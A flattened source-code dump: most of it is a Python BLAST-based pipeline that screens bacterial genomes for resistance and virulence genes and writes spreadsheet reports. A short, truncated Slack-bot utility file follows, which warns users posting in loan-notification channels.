if sample[self.analysistype].combinedtargets != 'NA':
# Add each fasta file combination to the threads
self.blastqueue.put((sample.general.bestassemblyfile, sample[self.analysistype].combinedtargets,
sample))
# Join the threads
self.blastqueue.join()
def runblast(self):
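        # Worker loop: pull (assembly, target database, sample) tuples from the queue, run
        # tblastx unless a non-empty report already exists, then parse the results.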
while True: # while daemon
(assembly, target, sample) = self.blastqueue.get() # grabs fastapath from dqueue
genome = os.path.splitext(os.path.split(assembly)[1])[0]
            # Run the Biopython tblastx wrapper with the genome as query, fasta (target gene) as db.
# Do not re-perform the BLAST search each time
make_path(sample[self.analysistype].reportdir)
sample[self.analysistype].report = os.path.join(
sample[self.analysistype].reportdir, '{}.csv'.format(genome))
try:
size = os.path.getsize(sample[self.analysistype].report)
# If a report was created, but no results entered - program crashed, or no sequences passed thresholds,
# remove the report, and run the blast analyses again
if size == 0:
os.remove(sample[self.analysistype].report)
except FileNotFoundError:
pass
# Split the extension from the file path
db = os.path.splitext(target)[0]
            # BLAST command-line call. Note the mildly restrictive evalue and the high number of alignments.
            # Because all the targets are combined into one database, this ensures that all potential
            # alignments are reported. Also note the custom outfmt: the doubled quotes are necessary to get it to work
blastx = NcbitblastxCommandline(query=assembly, db=db, evalue='1E-5', num_alignments=1000000,
num_threads=12,
outfmt="'6 qseqid sseqid positive mismatch gaps "
"evalue bitscore slen length qstart qend qframe qseq "
"sstart send sframe sseq'",
out=sample[self.analysistype].report)
# Save the blast command in the metadata
sample[self.analysistype].blastcommand = str(blastx)
# Only run blast if the report doesn't exist
if not os.path.isfile(sample[self.analysistype].report):
try:
blastx()
except ApplicationError:
self.blastqueue.task_done()
self.blastqueue.join()
try:
os.remove(sample[self.analysistype].report)
except (IOError, ApplicationError):
pass
raise
# Parse the output depending on whether unique results are desired
if self.unique:
self.uniqueblastparser(sample[self.analysistype].report, sample)
else:
# Run the blast parsing module
self.blastparser(sample[self.analysistype].report, sample)
self.blastqueue.task_done() # signals to dqueue job is done
def blastparser(self, report, sample):
"""
Parse the blast results, and store necessary data in dictionaries in sample object
:param report: Name of the blast output report being parsed
:param sample: sample object
"""
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(report), fieldnames=self.fieldnames, dialect='excel-tab')
resultdict = dict()
# Initialise a dictionary to store all the target sequences
sample[self.analysistype].targetsequence = dict()
# Go through each BLAST result
for row in blastdict:
            # Calculate the percent identity from the row
            # Percent identity here is (number of positive matches - gaps) / total subject length
percentidentity = float('{:0.2f}'.format((float(row['positives']) - float(row['gaps'])) /
float(row['subject_length']) * 100))
target = row['subject_id']
# If the percent identity is greater than the cutoff
if percentidentity >= self.cutoff:
# Update the dictionary with the target and percent identity
resultdict.update({target: percentidentity})
# Determine if the orientation of the sequence is reversed compared to the reference
if int(row['subject_end']) < int(row['subject_start']):
# Create a sequence object using Biopython
seq = Seq(row['query_sequence'])
# Calculate the reverse complement of the sequence
querysequence = str(seq.reverse_complement())
# If the sequence is not reversed, use the sequence as it is in the output
else:
querysequence = row['query_sequence']
# Add the sequence in the correct orientation to the sample
sample[self.analysistype].targetsequence[target] = querysequence
# Add the percent identity to the object
sample[self.analysistype].blastresults = resultdict
# Populate missing results with 'NA' values
if len(resultdict) == 0:
sample[self.analysistype].blastresults = 'NA'
def uniqueblastparser(self, report, sample):
"""
Find the best hit at a location, and discard any other matches
:param report: Name of the blast output report being parsed
:param sample: sample object
"""
# Encountering the following error: # _csv.Error: field larger than field limit (131072)
# According to https://stackoverflow.com/a/15063941, increasing the field limit should fix the issue
csv.field_size_limit(sys.maxsize)
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(report), fieldnames=self.fieldnames, dialect='excel-tab')
# Initialise a dictionary to store all the target sequences
sample[self.analysistype].targetsequence = dict()
sample[self.analysistype].queryranges = dict()
sample[self.analysistype].querypercent = dict()
sample[self.analysistype].queryscore = dict()
sample[self.analysistype].results = dict()
# Go through each BLAST result
for row in blastdict:
            # Calculate the percent identity and extract the bitscore from the row
            # Percent identity here is the number of positive matches / total subject length
percentidentity = float('{:0.2f}'.format((float(row['positives'])) /
float(row['subject_length']) * 100))
target = row['subject_id']
contig = row['query_id']
high = max([int(row['query_start']), int(row['query_end'])])
low = min([int(row['query_start']), int(row['query_end'])])
score = row['bit_score']
# Create new entries in the blast results dictionaries with the calculated variables
row['percentidentity'] = percentidentity
row['low'] = low
row['high'] = high
row['alignment_fraction'] = float('{:0.2f}'.format(float(float(row['alignment_length']) /
float(row['subject_length']) * 100)))
# If the percent identity is greater than the cutoff
if percentidentity >= self.cutoff:
try:
sample[self.analysistype].results[contig].append(row)
# Boolean to store whether the list needs to be updated
append = True
# Iterate through all the ranges in the list - if the new range is different than any of the ranges
# seen before, append it. Otherwise, update the previous ranges with the new, longer range as
# necessary e.g. [2494, 3296] will be updated to [2493, 3296] with [2493, 3293], and
# [2494, 3296] will become [[2493, 3296], [3296, 4132]] with [3296, 4132]
for spot in sample[self.analysistype].queryranges[contig]:
# Update the low value if the new low value is slightly lower than before
if 1 <= (spot[0] - low) <= 100:
# Update the low value
spot[0] = low
# It is not necessary to append
append = False
# Update the previous high value if the new high value is slightly higher than before
elif 1 <= (high - spot[1]) <= 100:
# Update the high value in the list
spot[1] = high
# It is not necessary to append
append = False
# Do not append if the new low is slightly larger than before
elif 1 <= (low - spot[0]) <= 100:
append = False
# Do not append if the new high is slightly smaller than before
elif 1 <= (spot[1] - high) <= 100:
append = False
# Do not append if the high and low are the same as the previously recorded values
elif low == spot[0] and high == spot[1]:
append = False
# If the result appears to be in a new location, add the data to the object
if append:
sample[self.analysistype].queryranges[contig].append([low, high])
sample[self.analysistype].querypercent[contig] = percentidentity
sample[self.analysistype].queryscore[contig] = score
# Initialise and populate the dictionary for each contig
except KeyError:
sample[self.analysistype].queryranges[contig] = list()
sample[self.analysistype].queryranges[contig].append([low, high])
sample[self.analysistype].querypercent[contig] = percentidentity
sample[self.analysistype].queryscore[contig] = score
sample[self.analysistype].results[contig] = list()
sample[self.analysistype].results[contig].append(row)
sample[self.analysistype].targetsequence[target] = dict()
# Determine if the query sequence is in a different frame than the subject, and correct
# by setting the query sequence to be the reverse complement
if int(row['subject_end']) < int(row['subject_start']):
# Create a sequence object using Biopython
seq = Seq(row['query_sequence'])
# Calculate the reverse complement of the sequence
querysequence = str(seq.reverse_complement())
# If the sequence is not reversed, use the sequence as it is in the output
else:
querysequence = row['query_sequence']
# Add the sequence in the correct orientation to the sample
sample[self.analysistype].targetsequence[target] = querysequence
def reporter(self):
"""
Creates .xlsx reports using xlsxwriter
"""
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
# Add a bold format for header cells. Using a monotype font size 10
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 10})
# Format for data cells. Monotype, size 10, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 10})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
for sample in self.metadata:
# Reset the column to zero
col = 0
# Initialise a list to store all the data for each strain
data = list()
# Initialise a list of all the headers with 'Strain'
headers = ['Strain']
if sample[self.analysistype].targetnames != 'NA':
# Append the sample name to the data list only if the script could find targets
data.append(sample.name)
if sample[self.analysistype].blastresults != 'NA':
for target in sorted(sample[self.analysistype].targetnames):
# Add the name of the gene to the header
headers.append(target)
try:
# Append the percent identity to the data list
data.append(str(sample[self.analysistype].blastresults[target]))
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and sample[self.analysistype].blastresults[target] != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, target)
# Add the appropriate headers
headers.extend(['{}_aa_Identity'.format(target),
'{}_aa_Alignment'.format(target),
'{}_aa_SNP_location'.format(target),
'{}_nt_Alignment'.format(target),
'{}_nt_SNP_location'.format(target)
])
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([sample[self.analysistype].aaidentity[target],
sample[self.analysistype].aaalign[target],
sample[self.analysistype].aaindex[target],
sample[self.analysistype].ntalign[target],
sample[self.analysistype].ntindex[target],
])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
# If there are no blast results at all, add a '-'
else:
data.append('-')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
                    columnwidth[col] = len(header) if len(header) > columnwidth[col] else columnwidth[col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# List of the number of lines for each result
totallines = list()
# Write out the data to the spreadsheet
for results in data:
worksheet.write(row, col, results, courier)
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(results.split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(results)
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Set the width of the row to be the number of lines (number of newline characters) * 12
if len(totallines) != 0:
worksheet.set_row(row, max(totallines) * 12)
else:
worksheet.set_row(row, 1)
# Increase the row counter for the next strain's data
row += 1
# Close the workbook
workbook.close()
def alignprotein(self, sample, target):
"""
Create alignments of the sample nucleotide and amino acid sequences to the reference sequences
"""
# Initialise dictionaries
sample[self.analysistype].dnaseq = dict()
sample[self.analysistype].protseq = dict()
sample[self.analysistype].ntindex = dict()
sample[self.analysistype].aaindex = dict()
sample[self.analysistype].ntalign = dict()
sample[self.analysistype].aaalign = dict()
sample[self.analysistype].aaidentity = dict()
# Remove any gaps incorporated into the sequence
sample[self.analysistype].targetsequence[target] = \
sample[self.analysistype].targetsequence[target].replace('-', '')
        # To translate the nucleotide sequence properly, Biopython requires that its length be a multiple of
        # three (no partial codons). Trim the sequence accordingly
remainder = 0 - len(sample[self.analysistype].targetsequence[target]) % 3
seq = sample[self.analysistype].targetsequence[target] if remainder == 0 \
else sample[self.analysistype].targetsequence[target][:remainder]
# Set the DNA and protein sequences of the target in the sample
sample[self.analysistype].dnaseq[target] = Seq(seq)
# Translate the nucleotide sequence
sample[self.analysistype].protseq[target] = str(sample[self.analysistype].dnaseq[target].translate())
for targetfile in self.targetfiles:
# Trim the reference sequence to multiples of three
refremainder = 0 - len(self.records[targetfile][target].seq) % 3
refseq = str(self.records[targetfile][target].seq) if refremainder % 3 == 0 \
else str(self.records[targetfile][target].seq)[:refremainder]
# Translate the nucleotide sequence of the reference sequence
refdna = Seq(refseq)
refprot = str(refdna.translate())
# Use pairwise2 to perform a local alignment with the following parameters:
# x No match parameters. Identical characters have score of 1, otherwise 0.
# s Same open (-1) and extend (-.1) gap penalties for both sequences
ntalignments = pairwise2.align.localxs(seq, refseq, -1, -.1)
# Use format_alignment to create a formatted alignment that is subsequently split on newlines e.g.
'''
ACCGT
| ||
A-CG-
Score=3
'''
ntformat = (str(format_alignment(*ntalignments[0])).split('\n'))
# Align the nucleotide sequence of the reference (ntalignments[2]) to the sample (ntalignments[0]).
# If the corresponding bases match, add a |, otherwise a space
ntalignment = ''.join(map(lambda x: '|' if len(set(x)) == 1 else ' ',
zip(ntformat[0], ntformat[2])))
# Create the nucleotide alignment: the sample sequence, the (mis)matches, and the reference sequence
sample[self.analysistype].ntalign[target] = self.interleaveblastresults(ntformat[0], ntformat[2])
# Regex to determine location of mismatches in the sequences
count = 0
sample[self.analysistype].ntindex[target] = str()
for snp in re.finditer(' ', ntalignment):
# If there are many SNPs, then insert line breaks for every 10 SNPs
if count <= 10:
sample[self.analysistype].ntindex[target] += str(snp.start()) + ';'
else:
sample[self.analysistype].ntindex[target] += '\n' + str(snp.start()) + ';'
count = 0
count += 1
# Perform the same steps, except for the amino acid sequence
aaalignments = pairwise2.align.localxs(sample[self.analysistype].protseq[target], refprot, -1, -.1)
aaformat = (str(format_alignment(*aaalignments[0])).split('\n'))
aaalignment = ''.join(map(lambda x: '|' if len(set(x)) == 1 else ' ',
zip(aaformat[0], aaformat[2])))
sample[self.analysistype].aaidentity[target] = '{:.2f}'\
.format(float(aaalignment.count('|')) / float(len(aaalignment)) * 100)
sample[self.analysistype].aaalign[target] = self.interleaveblastresults(aaformat[0], aaformat[2])
count = 0
sample[self.analysistype].aaindex[target] = str()
for snp in re.finditer(' ', aaalignment):
if count <= 10:
sample[self.analysistype].aaindex[target] += str(snp.start()) + ';'
else:
sample[self.analysistype].aaindex[target] += '\n' + str(snp.start()) + ';'
count = 0
count += 1
def resfinderreporter(self):
"""
Custom reports for ResFinder analyses. These reports link the gene(s) found to their resistance phenotypes
"""
from spadespipeline.typingclasses import ResistanceNotes
target_dir = str()
for folder in self.targetfolders:
target_dir = folder
genedict, altgenedict = ResistanceNotes.notes(target_dir)
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
# Add a bold format for header cells. Using a monotype font size 10
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 8})
# Format for data cells. Monotype, size 10, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 8})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
col = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
extended = False
headers = ['Strain', 'Gene', 'Allele', 'Resistance', 'PercentIdentity', 'PercentCovered', 'Contig', 'Location',
'nt_sequence']
for sample in self.metadata:
sample[self.analysistype].sampledata = list()
# Process the sample only if the script could find targets
if sample[self.analysistype].blastresults != 'NA' and sample[self.analysistype].blastresults:
for result in sample[self.analysistype].blastresults:
# Set the name to avoid writing out the dictionary[key] multiple times
name = result['subject_id']
# Use the ResistanceNotes gene name extraction method to get the necessary variables
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Initialise a list to store all the data for each strain
data = list()
# Determine the name of the gene to use in the report and the resistance using the resistance
# method
finalgene, resistance = ResistanceNotes.resistance(gname, genename, genedict, altgenedict)
# Append the necessary values to the data list
data.append(finalgene)
data.append(allele)
data.append(resistance)
percentid = result['percentidentity']
data.append(percentid)
data.append(result['alignment_fraction'])
data.append(result['query_id'])
data.append('...'.join([str(result['low']), str(result['high'])]))
try:
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and percentid != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, name)
if not extended:
# Add the appropriate headers
headers.extend(['aa_Identity',
'aa_Alignment',
'aa_SNP_location',
'nt_Alignment',
'nt_SNP_location'
])
extended = True
# Create a FASTA-formatted sequence output of the query sequence
record = SeqRecord(sample[self.analysistype].dnaseq[name],
id='{}_{}'.format(sample.name, name),
description='')
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([record.format('fasta'),
sample[self.analysistype].aaidentity[name],
sample[self.analysistype].aaalign[name],
sample[self.analysistype].aaindex[name],
sample[self.analysistype].ntalign[name],
sample[self.analysistype].ntindex[name]
])
else:
record = SeqRecord(Seq(result['query_sequence']),
id='{}_{}'.format(sample.name, name),
description='')
data.append(record.format('fasta'))
if self.align:
# Add '-'s for the empty results, as there are no alignments for exact matches
data.extend(['-', '-', '-', '-', '-'])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
sample[self.analysistype].sampledata.append(data)
if 'nt_sequence' not in headers:
headers.append('nt_sequence')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
columnwidth[col] = len(header) if len(header) > columnwidth[col] else columnwidth[
col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Write out the data to the spreadsheet
for sample in self.metadata:
if not sample[self.analysistype].sampledata:
worksheet.write(row, col, sample.name, courier)
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
                # No blast results for this sample; leave the row at its default height
                worksheet.set_row(row)
worksheet.set_column(col, col, columnwidth[col])
for data in sample[self.analysistype].sampledata:
columnwidth[col] = len(sample.name) + 2
worksheet.set_column(col, col, columnwidth[col])
worksheet.write(row, col, sample.name, courier)
col += 1
# List of the number of lines for each result
totallines = list()
for results in data:
#
worksheet.write(row, col, results, courier)
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[1])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
except IndexError:
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(str(results))
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else \
columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Set the width of the row to be the number of lines (number of newline characters) * 12
worksheet.set_row(row, max(totallines) * 11)
# Increase the row counter for the next strain's data
row += 1
col = 0
# Close the workbook
workbook.close()
def virulencefinderreporter(self):
with open(os.path.join(self.reportpath, 'virulence.csv'), 'w') as report:
header = 'Strain,Gene,PercentIdentity,PercentCovered,Contig,Location,Sequence\n'
data = ''
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
if sample[self.analysistype].blastresults:
data += '{},'.format(sample.name)
#
multiple = False
for result in sample[self.analysistype].blastresults:
if self.analysistype == 'virulence':
gene = result['subject_id'].split(':')[0]
else:
gene = result['subject_id']
if multiple:
data += ','
data += '{},{},{},{},{}..{},{}\n' \
.format(gene, result['percentidentity'], result['alignment_fraction'],
result['query_id'], result['low'], result['high'], result['query_sequence'])
# data += '\n'
multiple = True
else:
data += '{}\n'.format(sample.name)
else:
data += '{}\n'.format(sample.name)
report.write(header)
report.write(data)
@staticmethod
def interleaveblastresults(query, subject):
"""
Creates an interleaved string that resembles BLAST sequence comparisons
:param query: Query sequence
:param subject: Subject sequence
:return: Properly formatted BLAST-like sequence comparison
"""
# Initialise strings to hold the matches, and the final BLAST-formatted string
matchstring = ''
blaststring = ''
# Iterate through the query
for i, bp in enumerate(query):
# If the current base in the query is identical to the corresponding base in the reference, append a '|'
# to the match string, otherwise, append a ' '
if bp == subject[i]:
matchstring += '|'
else:
matchstring += ' '
# Set a variable to store the progress through the sequence
prev = 0
# Iterate through the query, from start to finish in steps of 60 bp
for j in range(0, len(query), 60):
# BLAST results string. The components are: current position (padded to four characters), 'OLC', query
# sequence, \n, matches, \n, 'ref', subject sequence. Repeated until all the sequence data are present.
"""
0000 OLC ATGAAGAAGATATTTGTAGCGGCTTTATTTGCTTTTGTTTCTGTTAATGCAATGGCAGCT
||||||||||| ||| | |||| ||||||||| || ||||||||||||||||||||||||
ref ATGAAGAAGATGTTTATGGCGGTTTTATTTGCATTAGTTTCTGTTAATGCAATGGCAGCT
0060 OLC GATTGTGCAAAAGGTAAAATTGAGTTCTCTAAGTATAATGAGAATGATACATTCACAGTA
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
ref GATTGTGCAAAAGGTAAAATTGAGTTCTCTAAGTATAATGAGAATGATACATTCACAGTA
"""
blaststring += '{} OLC {}\n {}\n ref {}\n' \
.format('{:04d}'.format(j), query[prev:j + 60], matchstring[prev:j + 60], subject[prev:j + 60])
# Update the progress variable
prev = j + 60
# Return the properly formatted string
return blaststring
def __init__(self, inputobject):
super().__init__(inputobject)
# Fields used for custom outfmt 6 BLAST output:
self.fieldnames = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps',
'evalue', 'bit_score', 'subject_length', 'alignment_length',
'query_start', 'query_end', 'query_frame', 'query_sequence',
'subject_start', 'subject_end', 'subject_frame', 'subject_sequence']
self.geneseekr()
def sequencenames(contigsfile):
"""
Takes a multifasta file and returns a list of sequence names
:param contigsfile: multifasta of all sequences
:return: list of all sequence names
"""
sequences = list()
    for record in SeqIO.parse(open(contigsfile, "r", encoding="iso-8859-15"), "fasta"):
sequences.append(record.id)
return sequences
if __name__ == '__main__':
class Parser(object):
def strainer(self):
# Get the sequences in the sequences folder into a list. Note that they must have a file extension that
# begins with .fa
            self.strains = sorted(glob(os.path.join(self.sequencepath, '*.fa*')))
self.targets = sorted(glob(os.path.join(self.targetpath, '*.tfa')))
try:
self.combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(self.targets, self.targetpath)
self.combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
# Populate the metadata object. This object will be populated to mirror the objects created in the
# genome assembly pipeline. This way this script will be able to be used as a stand-alone, or as part
# of a pipeline
            assert self.strains, 'Could not find any files with an extension starting with "fa" in {}. Please check ' \
                                 'to ensure that your sequence path is correct'.format(self.sequencepath)
            assert self.targets, 'Could not find any target files with a .tfa extension in {}. Please check ' \
                                 'to ensure that your target path is correct'.format(self.targetpath)
for sample in self.strains:
# Create the object
metadata = MetadataObject()
# Set the base file name of the sequence. Just remove the file extension
filename = os.path.splitext(os.path.split(sample)[1])[0]
# Set the .name attribute to be the file name
metadata.name = filename
# Create the .general attribute
metadata.general = GenObject()
# Create the .mlst attribute
setattr(metadata, self.analysistype, GenObject())
# Set the .general.bestassembly file to be the name and path of the sequence file
metadata.general.bestassemblyfile = sample
metadata[self.analysistype].targets = self.targets
metadata[self.analysistype].combinedtargets = self.combinedtargets
metadata[self.analysistype].targetpath = self.targetpath
metadata[self.analysistype].targetnames = sequencenames(self.combinedtargets)
metadata[self.analysistype].reportdir = self.reportpath
# Append the metadata for each sample to the list of samples
self.samples.append(metadata)
def __init__(self):
from argparse import ArgumentParser
parser = ArgumentParser(description='Use to find markers for any bacterial genome')
parser.add_argument('--version',
action='version',
version='%(prog)s v0.5')
parser.add_argument('-s', '--sequencepath',
required=True,
help='Specify input fasta folder')
parser.add_argument('-t', '--targetpath',
required=True,
help='Specify folder of targets')
parser.add_argument('-r', '--reportpath',
required=True,
help='Specify output folder for csv')
parser.add_argument('-c', '--cutoff',
type=int,
default=70, help='Threshold for maximum unique bacteria for a single antibiotic')
parser.add_argument('-n', '--numthreads',
type=int,
default=24,
help='Specify number of threads')
parser.add_argument('-a', '--align',
action='store_true',
help='Optionally output alignments of genes with less than 100%% identity to reference '
'genes. This alignment will use amino acid sequences for both query and reference')
parser.add_argument('-u', '--unique',
action='store_true',
help='Do not report multiple hits at the same location in a contig. Instead, store the '
'best hit, and ignore the rest')
parser.add_argument('-R', '--resfinder',
action='store_true',
help='Perform ResFinder-like analyses ')
parser.add_argument('-v', '--virulencefinder',
action='store_true',
help='Perform VirulenceFinder-like analyses')
args = parser.parse_args()
self.sequencepath = os.path.join(args.sequencepath)
assert os.path.isdir(self.sequencepath), 'Cannot locate sequence path as specified: {}'\
.format(self.sequencepath)
self.targetpath = os.path.join(args.targetpath)
assert os.path.isdir(self.targetpath), 'Cannot locate target path as specified: {}'\
.format(self.targetpath)
self.reportpath = os.path.join(args.reportpath)
make_path(self.reportpath)
assert os.path.isdir(self.reportpath), 'Cannot locate report path as specified: {}'\
.format(self.reportpath)
self.cutoff = args.cutoff
self.threads = args.numthreads
self.align = args.align
self.unique = args.unique
self.resfinder = args.resfinder
self.virulencefinder = args.virulencefinder
self.strains = list()
self.targets = list()
self.combinedtargets = str()
self.samples = list()
self.logfile = os.path.join(self.sequencepath, 'log.txt')
self.start = time.time()
if self.resfinder and self.virulencefinder:
printtime('Cannot perform ResFinder and VirulenceFinder simultaneously. Please choose only one '
'of the -R and -v flags', self.start)
quit()  # the two analyses are mutually exclusive
elif self.resfinder:
self.analysistype = 'resfinder'
elif self.virulencefinder:
self.analysistype = 'virulence'
else:
self.analysistype = 'geneseekr'
self.strainer()
class MetadataInit(object):
def __init__(self):
# Run the parser
self.runmetadata = Parser()
# Get the appropriate variables from the metadata file
self.start = self.runmetadata.start
self.analysistype = self.runmetadata.analysistype
self.cutoff = self.runmetadata.cutoff
self.threads = int(self.runmetadata.threads)
self.reportdir = self.runmetadata.reportpath
self.pipeline = False
self.referencefilepath = str()
self.align = self.runmetadata.align
self.unique = self.runmetadata.unique
self.logfile = self.runmetadata.logfile
# Run the analyses
GeneSeekr_tblastx(self)
# Run the class
MetadataInit()
class PipelineInit(object):
def strainer(self):
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
if self.genusspecific:
try:
genus = sample.general.closestrefseqgenus
except AttributeError:
genus = sample.general.referencegenus
# Allow Shigella to use the same targets as Escherichia
genus = genus if genus != 'Shigella' else 'Escherichia'
targetpath = os.path.join(self.referencefilepath, self.analysistype, genus)
else:
targetpath = os.path.join(self.referencefilepath, self.analysistype)
targets = glob(os.path.join(targetpath, '*.tfa'))
targetcheck = glob(os.path.join(targetpath, '*.tfa'))
if targetcheck:
try:
combinedtargets = glob(os.path.join(targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(targets, targetpath)
combinedtargets = glob(os.path.join(targetpath, '*.fasta'))[0]
sample[self.analysistype].targets = targets
sample[self.analysistype].combinedtargets = combinedtargets
sample[self.analysistype].targetpath = targetpath
sample[self.analysistype].targetnames = sequencenames(combinedtargets)
sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory,
self.analysistype)
else:
# Set the metadata file appropriately
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
else:
# Set the metadata file appropriately
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
def __init__(self, inputobject, analysistype, genusspecific, cutoff, unique):
self.runmetadata = inputobject.runmetadata
self.analysistype = analysistype
self.path = inputobject.path
self.start = inputobject.starttime
self.referencefilepath = inputobject.reffilepath
self.threads = inputobject.cpus
self.reportdir = inputobject.reportpath
self.cutoff = cutoff
self.logfile = inputobject.logfile
self.pipeline = True
self.genusspecific = genusspecific
self.align = False
self.unique = unique
# Get the alleles and profile into the metadata
self.strainer()
|
utils.py
|
import logging
from threading import Thread
from django.utils import timezone
from slacker import Slacker
from slacksocket import SlackSocket
def background(function):
def decorator(*args, **kwargs):
t = Thread(target=function, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return decorator
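# Usage sketch for the decorator above (the function name is hypothetical): the decorated call
# returns immediately and the body runs on a daemon thread, so callers get None back.
#
#   @background
#   def notify_async(msg):
#       SlackLog().info(msg)
#
#   notify_async('deployment finished')   # returns right away; posting happens in the background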
class SlackLog(object):
# TODO: change to RTM
logger = logging.getLogger('robozebra.SlackLog')
def log(self, level, msg):
try:
slack = Slacker('zzz') # zlatokopka
slack.chat.post_message('#syslog', '[{}] {}: {}'.format(timezone.now(), level, msg))
except Exception as ex:
self.logger.error('Error logging to Slack: {}. Original message: {}'.format(ex, msg))
def info(self, msg):
self.log('INFO', msg)
def error(self, msg):
self.log('ERROR', msg)
def debil(self, channel, user):
try:
slack = Slacker('zzz') # zlatokopka
slack.chat.post_message('#debilog', '[{}] {}'.format(channel, user))
except Exception:
pass
class SlackCleaner(object):
logger = logging.getLogger('robozebra.SlackCleaner')
slack_logger = SlackLog()
socket = None
def __init__(self, token):
self.socket = SlackSocket(token, translate=True)
@background
def listen(self):
try:
# self.logger.info('Listening for Slack events...')  # Logger objects are not callable; use .info()/.debug()
for event in self.socket.events():
if 'type' not in event.event or 'channel' not in event.event or 'user' not in event.event:
continue
if not event.event['channel'].startswith('zonky-') or event.event['user'] == 'zlatokopka':
continue
if 'subtype' in event.event and (event.event['subtype'] == 'channel_join'
or event.event['subtype'] == 'channel_leave'):
continue
if event.event['type'] == 'user_typing':
self.warn_user(event.event['user'])
if event.event['type'] == 'message':
self.logger.warning(
'Debil: channel: {}, user: {}; event: {}'.format(event.event['channel'], event.event['user'],
event.event))
self.slack_logger.debil(event.event['channel'], event.event['user'])
except Exception as ex:
self.logger.error('Error while listening to Slack: {}'.format(ex))
self.slack_logger.error('Listening loop probably down! {}'.format(ex))
def warn_user(self, username):
try:
im = self.socket.get_im_channel(user_name=username)
self.socket.send_msg(
"Prosim nepis nic do kanalu 'zonky-X' at nespoustis plane notifikace. Kanaly 'zonky-X' jsou urceny jen pro notifikace o novych pujckach.",
channel_id=im['id'], confirm=False)
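# Translation of the Czech message above: "Please don't write anything in the 'zonky-X'
# channels so you don't trigger pointless notifications. The 'zonky-X' channels are meant
# only for notifications about new loans."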
except Exception as ex:
self.logger.error('Error warning user via Slack: {}'.format(ex))
def delete_message(self, channel, ts):
